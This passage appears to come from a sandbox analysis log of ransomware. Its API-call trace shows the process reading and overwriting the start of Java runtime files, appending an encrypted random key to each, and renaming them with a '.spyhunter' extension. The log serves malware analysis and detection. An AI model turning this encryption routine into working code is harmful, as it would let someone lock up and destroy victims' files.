lpNumberOfBytesWritten=0x57e53c*=0x2800, lpOverlapped=0x0) returned 1 [0172.533] GetProcessHeap () returned 0x2c0000 [0172.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0172.533] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.534] WriteFile (in: hFile=0x178, lpBuffer=0x57e57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e53c, lpOverlapped=0x0 | out: lpBuffer=0x57e57c*, lpNumberOfBytesWritten=0x57e53c*=0x4, lpOverlapped=0x0) returned 1 [0172.535] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e53c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e53c*=0x30, lpOverlapped=0x0) returned 1 [0172.535] CloseHandle (hObject=0x178) returned 1 [0172.536] GetProcessHeap () returned 0x2c0000 [0172.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.536] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.spyhunter") returned 69 [0172.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip.spyhunter")) returned 1 [0172.537] GetProcessHeap () returned 0x2c0000 [0172.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.538] GetProcessHeap () returned 0x2c0000 [0172.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0172.538] GetProcessHeap () returned 0x2c0000 [0172.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fc40 | out: hHeap=0x2c0000) returned 1 [0172.538] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e580 | out: pbBuffer=0x57e580) returned 1 [0172.538] GetProcessHeap () returned 0x2c0000 [0172.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0172.538] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e578*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e578*=0x30) returned 1 [0172.538] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\currency.data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0172.539] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data") returned 54 [0172.539] StrStrW (lpFirst="currency.data", lpSrch=".txt") returned 0x0 [0172.539] GetProcessHeap () returned 0x2c0000 [0172.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0172.539] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e53c*=0x1068, lpOverlapped=0x0) returned 1 [0173.820] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffef98, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.820] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1068, lpNumberOfBytesWritten=0x57e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e53c*=0x1068, lpOverlapped=0x0) returned 1 [0173.820] GetProcessHeap () returned 0x2c0000 [0173.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0173.820] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.820] WriteFile (in: hFile=0x178, lpBuffer=0x57e57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e53c, lpOverlapped=0x0 | out: lpBuffer=0x57e57c*, lpNumberOfBytesWritten=0x57e53c*=0x4, lpOverlapped=0x0) returned 1 [0173.820] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e53c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e53c*=0x30, lpOverlapped=0x0) returned 1 [0173.820] CloseHandle (hObject=0x178) returned 1 [0173.820] GetProcessHeap () returned 0x2c0000 [0173.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.820] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data.spyhunter") returned 64 [0173.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\currency.data"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\currency.data.spyhunter")) returned 1 [0173.822] GetProcessHeap () returned 0x2c0000 [0173.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.822] GetProcessHeap () returned 0x2c0000 [0173.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0173.822] GetProcessHeap () returned 0x2c0000 [0173.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3aa0 | out: hHeap=0x2c0000) returned 1 [0173.822] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e578 | out: pbBuffer=0x57e578) returned 1 [0173.822] GetProcessHeap () returned 0x2c0000 [0173.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0173.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e570*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e570*=0x30) returned 1 [0173.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunec.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0173.823] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunec.dll") returned 50 [0173.823] StrStrW (lpFirst="sunec.dll", lpSrch=".txt") returned 0x0 [0173.823] GetProcessHeap () returned 0x2c0000 [0173.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0173.823] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e534, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e534*=0x2800, lpOverlapped=0x0) returned 1 [0173.836] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.836] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e534, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e534*=0x2800, lpOverlapped=0x0) returned 1 [0173.836] GetProcessHeap () returned 0x2c0000 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0173.836] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.836] WriteFile (in: hFile=0x178, lpBuffer=0x57e574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e534, lpOverlapped=0x0 | out: lpBuffer=0x57e574*, lpNumberOfBytesWritten=0x57e534*=0x4, lpOverlapped=0x0) returned 1 [0173.837] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e534, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e534*=0x30, lpOverlapped=0x0) returned 1 [0173.837] CloseHandle (hObject=0x178) returned 1 [0173.837] GetProcessHeap () returned 0x2c0000 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.837] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunec.dll.spyhunter") returned 60 [0173.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunec.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunec.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunec.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunec.dll.spyhunter")) returned 1 [0173.838] GetProcessHeap () returned 0x2c0000 [0173.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.838] GetProcessHeap () returned 0x2c0000 [0173.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0173.838] GetProcessHeap () returned 0x2c0000 [0173.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21ba0 | out: hHeap=0x2c0000) returned 1 [0173.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e578 | out: pbBuffer=0x57e578) returned 1 [0173.838] GetProcessHeap () returned 0x2c0000 [0173.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0173.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e570*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e570*=0x30) returned 1 [0173.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\splashscreen.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\splashscreen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0173.839] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\splashscreen.dll") returned 57 [0173.839] StrStrW (lpFirst="splashscreen.dll", lpSrch=".txt") returned 0x0 [0173.839] GetProcessHeap () returned 0x2c0000 [0173.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0173.839] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e534, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e534*=0x2800, lpOverlapped=0x0) returned 1 [0173.904] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.904] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e534, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e534*=0x2800, lpOverlapped=0x0) returned 1 [0173.904] GetProcessHeap () returned 0x2c0000 [0173.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0173.904] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.904] WriteFile (in: hFile=0x178, lpBuffer=0x57e574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e534, lpOverlapped=0x0 | out: lpBuffer=0x57e574*, lpNumberOfBytesWritten=0x57e534*=0x4, lpOverlapped=0x0) returned 1 [0173.905] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e534, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e534*=0x30, lpOverlapped=0x0) returned 1 [0173.905] CloseHandle (hObject=0x178) returned 1 [0173.905] GetProcessHeap () returned 0x2c0000 [0173.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.905] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\splashscreen.dll.spyhunter") returned 67 [0173.906] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\splashscreen.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\splashscreen.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\splashscreen.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\splashscreen.dll.spyhunter")) returned 1 [0173.909] GetProcessHeap () returned 0x2c0000 [0173.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.909] GetProcessHeap () returned 0x2c0000 [0173.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0173.909] GetProcessHeap () returned 0x2c0000 [0173.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fa00 | out: hHeap=0x2c0000) returned 1 [0173.909] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e570 | out: pbBuffer=0x57e570) returned 1 [0173.909] GetProcessHeap () returned 0x2c0000 [0173.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0173.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e568*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e568*=0x30) returned 1 [0173.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\servertool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0173.910] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe") returned 55 [0173.910] StrStrW (lpFirst="servertool.exe", lpSrch=".txt") returned 0x0 [0173.910] GetProcessHeap () returned 0x2c0000 [0173.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0173.911] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e52c*=0x2800, lpOverlapped=0x0) returned 1 [0174.061] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.062] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e52c*=0x2800, lpOverlapped=0x0) returned 1 [0174.062] GetProcessHeap () returned 0x2c0000 [0174.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.062] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.062] WriteFile (in: hFile=0x178, lpBuffer=0x57e56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e52c, lpOverlapped=0x0 | out: lpBuffer=0x57e56c*, lpNumberOfBytesWritten=0x57e52c*=0x4, lpOverlapped=0x0) returned 1 [0174.077] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e52c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e52c*=0x30, lpOverlapped=0x0) returned 1 [0174.077] CloseHandle (hObject=0x178) returned 1 [0174.077] GetProcessHeap () returned 0x2c0000 [0174.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.077] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe.spyhunter") returned 65 [0174.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\servertool.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\servertool.exe.spyhunter")) returned 1 [0174.079] GetProcessHeap () returned 0x2c0000 [0174.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.079] GetProcessHeap () returned 0x2c0000 [0174.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.079] GetProcessHeap () returned 0x2c0000 [0174.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3370 | out: hHeap=0x2c0000) returned 1 [0174.079] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e570 | out: pbBuffer=0x57e570) returned 1 [0174.079] GetProcessHeap () returned 0x2c0000 [0174.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.079] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e568*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e568*=0x30) returned 1 [0174.079] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.080] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\msvcr100.dll") returned 61 [0174.080] StrStrW (lpFirst="msvcr100.dll", lpSrch=".txt") returned 0x0 [0174.080] GetProcessHeap () returned 0x2c0000 [0174.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0174.080] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e52c*=0x2800, lpOverlapped=0x0) returned 1 [0174.133] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.134] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e52c*=0x2800, lpOverlapped=0x0) returned 1 [0174.134] GetProcessHeap () returned 0x2c0000 [0174.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0174.134] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.134] WriteFile (in: hFile=0x178, lpBuffer=0x57e56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e52c, lpOverlapped=0x0 | out: lpBuffer=0x57e56c*, lpNumberOfBytesWritten=0x57e52c*=0x4, lpOverlapped=0x0) returned 1 [0174.139] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e52c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e52c*=0x30, lpOverlapped=0x0) returned 1 [0174.139] CloseHandle (hObject=0x178) returned 1 [0174.139] GetProcessHeap () returned 0x2c0000 [0174.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.139] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\msvcr100.dll.spyhunter") returned 71 [0174.139] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\msvcr100.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\msvcr100.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\msvcr100.dll.spyhunter")) returned 1 [0174.147] GetProcessHeap () returned 0x2c0000 [0174.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.147] GetProcessHeap () returned 0x2c0000 [0174.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.147] GetProcessHeap () returned 0x2c0000 [0174.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf6f0 | out: hHeap=0x2c0000) returned 1 [0174.147] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e568 | out: pbBuffer=0x57e568) returned 1 [0174.147] GetProcessHeap () returned 0x2c0000 [0174.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.147] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e560*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e560*=0x30) returned 1 [0174.147] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.149] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npt.dll") returned 48 [0174.149] StrStrW (lpFirst="npt.dll", lpSrch=".txt") returned 0x0 [0174.149] GetProcessHeap () returned 0x2c0000 [0174.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0174.149] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e524*=0x2800, lpOverlapped=0x0) returned 1 [0174.297] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.298] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e524*=0x2800, lpOverlapped=0x0) returned 1 [0174.298] GetProcessHeap () returned 0x2c0000 [0174.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0174.298] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.298] WriteFile (in: hFile=0x178, lpBuffer=0x57e564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e524, lpOverlapped=0x0 | out: lpBuffer=0x57e564*, lpNumberOfBytesWritten=0x57e524*=0x4, lpOverlapped=0x0) returned 1 [0174.323] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e524, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e524*=0x30, lpOverlapped=0x0) returned 1 [0174.323] CloseHandle (hObject=0x178) returned 1 [0174.323] GetProcessHeap () returned 0x2c0000 [0174.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.323] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npt.dll.spyhunter") returned 58 [0174.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npt.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npt.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npt.dll.spyhunter")) returned 1 [0174.324] GetProcessHeap () returned 0x2c0000 [0174.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.324] GetProcessHeap () returned 0x2c0000 [0174.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.324] GetProcessHeap () returned 0x2c0000 [0174.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c218e0 | out: hHeap=0x2c0000) returned 1 [0174.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e568 | out: pbBuffer=0x57e568) returned 1 [0174.325] GetProcessHeap () returned 0x2c0000 [0174.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.325] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, 